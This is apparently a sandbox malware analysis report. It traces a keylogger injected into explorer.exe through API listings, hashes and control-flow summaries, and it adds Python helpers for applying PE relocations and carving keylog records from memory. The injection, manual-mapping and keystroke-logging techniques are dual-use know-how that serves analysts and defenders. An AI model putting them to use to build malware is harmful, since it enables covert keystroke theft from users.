                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 10cd1137b21299d640be6811cc71e9b5360a0b717cd8c14098db3f688186e358
                                                                        • Instruction ID: c99089e0e250c2c09ea691a0d37878a4ee8324388b7e5a50f8fa6396377310a5
                                                                        • Opcode Fuzzy Hash: 10cd1137b21299d640be6811cc71e9b5360a0b717cd8c14098db3f688186e358
                                                                        • Instruction Fuzzy Hash: FEA18D7560A308AFEB50EF68D884A6FBBECFB89340F04082EF585C7251DB34D9049B56

                                                                        Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                                                                        • Entry block 30912ae-30912bf
                                                                        • Block 30912d4: call 30929bd
                                                                        • Block 30912d9-30912fc: lstrlen, call 3092a09
                                                                        • Block 30912fe-3091327: call 3092841, RtlZeroMemory
                                                                        • Block 3091329-309134f: RtlMoveMemory, call 3092569
                                                                        • Block 3091353-3091369: RtlMoveMemory, call 3092569
                                                                        • Block 309136e-3091377: call 30929eb
                                                                        • Block 309137f-3091392: call 309255c, PathMatchSpecA
                                                                        • Block 309139d-30913a5: call 30929ae
                                                                        • Exit block 30913a6-30913ad
                                                                        APIs
                                                                          • Part of subcall function 030929BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,030912D9,00000000,00000000,?,00000001), ref: 030929C7
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 030912DC
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0309138A
                                                                          • Part of subcall function 03092841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,03091119,00000001), ref: 03092850
                                                                          • Part of subcall function 03092841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,03091119,00000001), ref: 03092855
                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 03091316
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 03091332
                                                                          • Part of subcall function 03092569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0309136E), ref: 03092591
                                                                          • Part of subcall function 03092569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0309259A
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0309135F
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                        • String ID:
                                                                        • API String ID: 2993730741-0
                                                                        • Opcode ID: c0d52a75d80ed9591200087a7688a9ecd7e6a2f2aa74e4d1a351d11bdd14c050
                                                                        • Instruction ID: b43734e3ff2611a81987477027a9c7599dcc8f1545782ee53710edbc39b4ca36
                                                                        • Opcode Fuzzy Hash: c0d52a75d80ed9591200087a7688a9ecd7e6a2f2aa74e4d1a351d11bdd14c050
                                                                        • Instruction Fuzzy Hash: A721A578706306AFAB04EF28945447EB7EEBBC8600B04492FF895D7340DB34DC05AA66

Control-flow Graph
Control-flow graph of the function at 0x03091581 (graph not rendered): basic blocks 0x03091581-0x03091628; calls GlobalLock, lstrlenW, lstrcatW and GlobalUnlock, plus the subroutines at 0x0309293E, 0x03092724, 0x030916B9, 0x03092A09 and 0x030929EB.
                                                                        APIs
                                                                        • GlobalLock.KERNEL32(00000000), ref: 030915A9
                                                                        • lstrlenW.KERNEL32(00000000), ref: 030915C6
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 030915DC
                                                                        • lstrlenW.KERNEL32(00000000), ref: 03091600
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0309161C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                        • String ID:
                                                                        • API String ID: 1114890469-0
                                                                        • Opcode ID: c08bd3143a1575c29fc0ef17a51a08cc241f3cb3fd9e8dee6e15e8a1c0e627af
                                                                        • Instruction ID: 3987f8e1d6672755f031ba4884092ea9ac45d4b51db3936e016f1de16092d020
                                                                        • Opcode Fuzzy Hash: c08bd3143a1575c29fc0ef17a51a08cc241f3cb3fd9e8dee6e15e8a1c0e627af
                                                                        • Instruction Fuzzy Hash: E501E93AF03106ABBE6DF7796C585BEA2EDAFC611070E0427E447D2314DE288C026650

Control-flow Graph
Control-flow graph of the function at 0x03091BBD (graph not rendered): basic blocks 0x03091BBD-0x03091CBD; calls RtlMoveMemory, LoadLibraryA, GetProcAddress and LdrProcessRelocationBlock.
                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03091BF4
                                                                        • LoadLibraryA.KERNEL32(?,03095848,00000000,00000000,75922EE0,00000000,030919B6,?,?,?,00000001,?,00000000), ref: 03091C1C
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03091C49
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03091C9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: 3e2004b269e34dd4ee121584ab11494cfe91102d731b6eefacc3be41cfe4b7fb
                                                                        • Instruction ID: d0d15f9aebb7b92f64747209768ee65537e2f4c9dd9c145b02593eadf429f053
                                                                        • Opcode Fuzzy Hash: 3e2004b269e34dd4ee121584ab11494cfe91102d731b6eefacc3be41cfe4b7fb
                                                                        • Instruction Fuzzy Hash: DC31C0B5706203ABEF5CCF29C886B66B7E8BF05304B08456EE886C7200D735E845DBA0
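The function at 0x03091BBD copies image bytes with RtlMoveMemory, resolves imports with LoadLibraryA/GetProcAddress and then calls LdrProcessRelocationBlock, which is the sequence of a manual PE mapper rather than a normal loader path. As an added illustration (not the sample's code and not Joe Sandbox output), the Python below applies a .reloc block the way ntdll's LdrProcessRelocationBlock does: each IMAGE_BASE_RELOCATION block carries a page RVA and a block size followed by 16-bit entries whose top four bits are the type (IMAGE_REL_BASED_HIGHLOW patches a 32-bit absolute address by the delta between actual and preferred base; IMAGE_REL_BASED_ABSOLUTE is alignment padding). The image buffer, the relocation block and the load addresses are constructed for the demo; the function names are my own.

```python
import struct

# Relocation entry types from the PE specification.
IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, no fixup
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address (PE32)
IMAGE_REL_BASED_DIR64 = 10     # 64-bit absolute address (PE32+)


def process_relocation_block(image: bytearray, page_rva: int, entries: bytes, delta: int) -> int:
    """Apply one IMAGE_BASE_RELOCATION block to `image` (a bytearray indexed by RVA).

    This mirrors what LdrProcessRelocationBlock does for a single block:
    every entry is (type << 12) | offset_within_page. Returns the fixup count.
    """
    applied = 0
    for (entry,) in struct.iter_unpack("<H", entries):
        reloc_type = entry >> 12
        target = page_rva + (entry & 0xFFF)
        if reloc_type == IMAGE_REL_BASED_ABSOLUTE:
            continue  # 4-byte alignment padding at the end of a block
        if reloc_type == IMAGE_REL_BASED_HIGHLOW:
            (val,) = struct.unpack_from("<I", image, target)
            struct.pack_into("<I", image, target, (val + delta) & 0xFFFFFFFF)
        elif reloc_type == IMAGE_REL_BASED_DIR64:
            (val,) = struct.unpack_from("<Q", image, target)
            struct.pack_into("<Q", image, target, (val + delta) & 0xFFFFFFFFFFFFFFFF)
        else:
            raise ValueError(f"unsupported relocation type {reloc_type}")
        applied += 1
    return applied


def apply_relocations(image: bytearray, reloc_dir: bytes, preferred_base: int, actual_base: int) -> int:
    """Walk the .reloc directory (consecutive IMAGE_BASE_RELOCATION blocks) and fix up the image."""
    delta = actual_base - preferred_base
    total = 0
    pos = 0
    while pos + 8 <= len(reloc_dir):
        page_rva, block_size = struct.unpack_from("<II", reloc_dir, pos)
        if block_size == 0:  # a zero-sized block terminates the directory
            break
        total += process_relocation_block(image, page_rva, reloc_dir[pos + 8:pos + block_size], delta)
        pos += block_size
    return total


def build_demo():
    """Constructed demo image: preferred base 0x400000, two absolute pointers in page 0x1000,
    one .reloc block with two HIGHLOW entries and one ABSOLUTE padding entry."""
    preferred_base = 0x00400000
    actual_base = 0x03090000  # arbitrary load address chosen for the demo
    image = bytearray(0x2000)
    struct.pack_into("<I", image, 0x1010, preferred_base + 0x1500)  # pointer into the image
    struct.pack_into("<I", image, 0x1020, preferred_base + 0x1800)
    entries = struct.pack(
        "<HHH",
        (IMAGE_REL_BASED_HIGHLOW << 12) | 0x010,
        (IMAGE_REL_BASED_HIGHLOW << 12) | 0x020,
        (IMAGE_REL_BASED_ABSOLUTE << 12) | 0x000,
    )
    block = struct.pack("<II", 0x1000, 8 + len(entries)) + entries
    return image, block, preferred_base, actual_base


def relocated_pointers():
    """Run the demo and return (fixups applied, pointer at 0x1010, pointer at 0x1020)."""
    image, reloc_dir, preferred, actual = build_demo()
    n = apply_relocations(image, reloc_dir, preferred, actual)
    p1 = struct.unpack_from("<I", image, 0x1010)[0]
    p2 = struct.unpack_from("<I", image, 0x1020)[0]
    return n, p1, p2


if __name__ == "__main__":
    n, p1, p2 = relocated_pointers()
    print(f"{n} fixups applied: 0x{p1:08X} 0x{p2:08X}")
```

When triaging a mapper like this one, the delta it computes (actual minus preferred base) and the pages it touches are what distinguish a relocated payload from the on-disk copy, so dumping the region after the LdrProcessRelocationBlock loop, not before, gives a copy that matches the running code.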
                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(0309582C), ref: 03091839
                                                                        • lstrlenW.KERNEL32 ref: 03091845
                                                                        • RtlLeaveCriticalSection.NTDLL(0309582C), ref: 030918A9
                                                                        • Sleep.KERNEL32(00007530), ref: 030918B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                        • String ID:
                                                                        • API String ID: 2134730579-0
                                                                        • Opcode ID: 8f33614fa95ee3bbbb64c44a8e766dc90e1bf5f69030a41d7ad154ed54c19018
                                                                        • Instruction ID: b7227fafe131f7044991235c2b1989dc6fbd57f560e54af07a5585bb8a26fede
                                                                        • Opcode Fuzzy Hash: 8f33614fa95ee3bbbb64c44a8e766dc90e1bf5f69030a41d7ad154ed54c19018
                                                                        • Instruction Fuzzy Hash: 6A01A734617604BBEB15F766EC5956F3AADFBC2740305005BE0418B254DA388C01FBA1
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,030911DD), ref: 030926DB
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 030926ED
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 03092700
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092716
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 331459951-0
                                                                        • Opcode ID: 31f4c48a692d2eed1591d0f7e6930b12bf7dab81f0fb629497924f075c97ab93
                                                                        • Instruction ID: e62bad9f902f708453b8cfa553e71e07c457c1baa0e6aa96a339332faefbf8d3
                                                                        • Opcode Fuzzy Hash: 31f4c48a692d2eed1591d0f7e6930b12bf7dab81f0fb629497924f075c97ab93
                                                                        • Instruction Fuzzy Hash: 7AF0907980721CFFAB10DFA09D888AFF7BCEE05251B1402ABE901A3140D7344E00AAA0
                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 030917F3
                                                                        • wsprintfW.USER32 ref: 0309181D
                                                                        Strings
                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 03091817
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                        • API String ID: 377395780-613334611
                                                                        • Opcode ID: 7b99a3f8581092cf624b46e222b6a679a6ac966fc59eba5190e8b1a763feb5ab
                                                                        • Instruction ID: 1e0036d50191c61bfc0e59d3590835af4bd816d5deb800ebd322184157dffec5
                                                                        • Opcode Fuzzy Hash: 7b99a3f8581092cf624b46e222b6a679a6ac966fc59eba5190e8b1a763feb5ab
                                                                        • Instruction Fuzzy Hash: 97F03066901128BADB14ABDE9C058FFB3FCEB0CB02B00018BFA95E1180E67C5950D7B5
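The function at 0x030917F3 stamps each log record with GetLocalTime formatted through wsprintfW as "[%02d.%02d.%d %02d:%02d:%02d]", so the marker lives in memory as UTF-16LE and an ASCII grep over a process dump will not find it. The following Python is an added carving helper (mine, not the sample's logic or Joe Sandbox output) that matches the shape of that format over UTF-16LE bytes and returns the wide text that follows each stamp. The page does not say in which order the SYSTEMTIME fields are printed, so the pattern checks digit counts only; the sample dump bytes are constructed.

```python
import re


def _wide(literal: str) -> bytes:
    """Regex fragment that matches `literal` encoded as UTF-16LE (each char followed by a NUL)."""
    return b"".join(re.escape(c.encode("ascii")) + b"\x00" for c in literal)


_DIGIT = rb"(?:[0-9]\x00)"  # one wide decimal digit

# Shape of "[%02d.%02d.%d %02d:%02d:%02d]" as produced by wsprintfW: the %d year may be 1-5 digits.
STAMP_RE = re.compile(
    _wide("[") + _DIGIT + b"{2}" + _wide(".") + _DIGIT + b"{2}" + _wide(".") + _DIGIT + b"{1,5}"
    + _wide(" ") + _DIGIT + b"{2}" + _wide(":") + _DIGIT + b"{2}" + _wide(":") + _DIGIT + b"{2}"
    + _wide("]")
)


def carve_keylog_entries(buf: bytes):
    """Return (offset, timestamp, text) for every wide timestamp in `buf`.

    `text` is the wide string following the stamp, cut at its NUL terminator or at the next stamp.
    """
    matches = list(STAMP_RE.finditer(buf))
    entries = []
    for i, m in enumerate(matches):
        stamp = m.group(0).decode("utf-16-le")
        limit = matches[i + 1].start() if i + 1 < len(matches) else len(buf)
        region = buf[m.end():limit]
        region = region[: len(region) & ~1]  # keep UTF-16 code-unit alignment
        text = region.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
        entries.append((m.start(), stamp, text))
    return entries


def build_demo_dump() -> bytes:
    """Constructed memory region: 256 bytes of filler, two wide log records, a wide NUL, more filler."""
    filler = bytes(range(256))
    rec1 = "[24.09.2024 13:05:07]".encode("utf-16-le") + "notepad: hello".encode("utf-16-le")
    rec2 = "[24.09.2024 13:05:09]".encode("utf-16-le") + "chrome: p4ss".encode("utf-16-le") + b"\x00\x00"
    return filler + rec1 + rec2 + filler


if __name__ == "__main__":
    for offset, stamp, text in carve_keylog_entries(build_demo_dump()):
        print(f"0x{offset:06X} {stamp} {text!r}")
```

Run it over the explorer.exe memory dump the report names (hcaresult_16_2_3091000_explorer.jbxd) or over any region the injected module allocates with GlobalLock/lstrcatW; anything matching the narrow ASCII form instead is not this logger's output.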

Callgraph
Callgraph of the module at 0x00621000 in explorer.exe (graph not rendered): 84 functions, Function_00621000 through Function_0062C00C. Function_0062370C (NtUnmapViewOfSection) calls Function_00621C6C, Function_006234C4, Function_006231AC, Function_00621838 and itself; Function_0062B358 and Function_0062B2BE both reach Function_0062B4A8 (LoadLibraryA/VirtualProtect), which calls Function_0062B46A.

Control-flow Graph
Control-flow graph of the function at 0x0062370C (graph not rendered): basic blocks 0x0062370C-0x006237DE; calls NtUnmapViewOfSection and the subroutines at 0x00621C6C, 0x00621838, 0x006234C4 and 0x006231AC, and recurses into itself at 0x006237D0.
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 0062378C
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                        • Instruction ID: 0e225eee23b335dada8c34161d5d26838191a57c19187175ce99dd63b5d1ee95
                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                        • Instruction Fuzzy Hash: 79119374601D294BEF58FB78A89D2B533D3E754312F54402DA815CB3A2DF3D8A858B08

Control-flow Graph
Control-flow graph of the function at 0x0062B4A8 (graph not rendered): basic blocks 0x0062B4A8-0x0062B694; calls LoadLibraryA, VirtualProtect (twice) and the subroutine at 0x0062B46A.
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0062B5A7
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0062B651
                                                                        • VirtualProtect.KERNELBASE ref: 0062B66F
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.000000000062A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0062A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_62a000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                        • Instruction ID: a433d342c0d41108eb40e56c0b469c3cee1f94dc0596d5370a39c7133ce11e89
                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                        • Instruction Fuzzy Hash: 8C517B31754D3E4BCB24AE78BCC42F4B7D3F755325B18166AC49ACB385E758C8868B81

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00621BF8: OpenFileMappingA.KERNEL32 ref: 00621C0F
                                                                          • Part of subcall function 00621BF8: MapViewOfFile.KERNELBASE ref: 00621C2E
                                                                        • SysFreeMap.PGOCR ref: 006236F7
                                                                        • SleepEx.KERNELBASE ref: 00623701
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                        • String ID:
                                                                        • API String ID: 4205437007-0
                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                        • Instruction ID: cf9c9c703a93b49925208f26c190c97b050b6cfea26fbca33a97b82f934907c7
                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                        • Instruction Fuzzy Hash: 38519730208E284FDB59FB24E8996EA7397EBA5310F44461DE457C73A1DF38D6058B85

Control-flow Graph
Control-flow graph of the function at 0x00621BF8 (graph not rendered): basic blocks 0x00621BF8-0x00621C48; calls OpenFileMappingA, then MapViewOfFile when the mapping opens.
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.4535106914.0000000000621000.00000040.80000000.00040000.00000000.sdmp, Offset: 00621000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_621000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$MappingOpenView
                                                                        • String ID:
                                                                        • API String ID: 3439327939-0
                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                        • Instruction ID: 7e864cbc68533d615d0ff4466237fabe915e5faecd6b2bba141795472722c220
                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                        • Instruction Fuzzy Hash: 31F08234318F0D4FAB44EF7C9C9C135B7E1EBA8202700857A984AC6264EF34C8418701